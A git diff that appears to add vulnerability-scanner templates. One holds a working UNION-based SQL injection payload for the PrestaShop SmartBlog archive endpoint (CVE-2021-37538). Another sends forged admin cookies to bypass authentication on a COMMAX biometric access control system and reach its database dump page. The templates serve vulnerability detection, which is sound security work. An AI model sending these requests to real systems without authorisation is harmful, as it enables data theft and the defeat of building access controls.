diff --git a/cves/2021/CVE-2021-37538.yaml b/cves/2021/CVE-2021-37538.yaml new file mode 100644 index 0000000000..758e66491c --- /dev/null +++ b/cves/2021/CVE-2021-37538.yaml @@ -0,0 +1,27 @@ +id: CVE-2021-37538 + +info: + name: PrestaShop SmartBlog SQL Injection + author: whoever + severity: high + description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection in the blog archive functionality. + tags: cve,cve2021,prestashop,smartblog,sqli + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37538 + - https://blog.sorcery.ie/posts/smartblog_sqli/ + +requests: + - method: GET + path: + - "{{BaseURL}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "c5fe25896e49ddfe996db7508cf00534" + part: body diff --git a/technologies/teradici-pcoip.yaml b/technologies/teradici-pcoip.yaml new file mode 100644 index 0000000000..2fcaf22733 --- /dev/null +++ b/technologies/teradici-pcoip.yaml @@ -0,0 +1,23 @@ +id: teradici-pcoip + +info: + name: Teradici PCoIP Detection + author: pdteam + severity: info + tags: tech,pcoip + +requests: + - method: GET + path: + - "{{BaseURL}}/info/" + + matchers: + - type: word + words: + - "PCoIP Connection Manager" + + extractors: + - type: regex + group: 1 + regex: + - 'PCoIP Connection Manager\/([0-9.]+)\.' \ No newline at end of file diff --git a/vulnerabilities/other/commax-biometric-auth-bypass.yaml b/vulnerabilities/other/commax-biometric-auth-bypass.yaml new file mode 100644 index 0000000000..dfdc0ae4a8 --- /dev/null +++ b/vulnerabilities/other/commax-biometric-auth-bypass.yaml @@ -0,0 +1,35 @@ +id: commax-biometric-auth-bypass + +info: + name: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass + author: gy741 + severity: critical + description: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings. + reference: + - https://www.exploit-db.com/exploits/50206 + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php + tags: commax,auth-bypass + +requests: + - raw: + - | + GET /db_dump.php HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Referer: {{BaseURL}}/user_add.php + Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "::: COMMAX :::" + + - type: word + part: header + words: + - "text/html" diff --git a/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml index 6ca5d17599..d7670dd3da 100644 --- a/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml +++ b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml @@ -1,7 +1,7 @@ id: wp-woocommerce-pdf-invoice-listing info: - name: WordPress Upload Fuzzing + name: Woocommerce PDF Invoice Exposure author: mohammedsaneem,sec_hawk severity: medium description: Allows attacker to view sensitive information such as company invoices @@ -28,4 +28,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200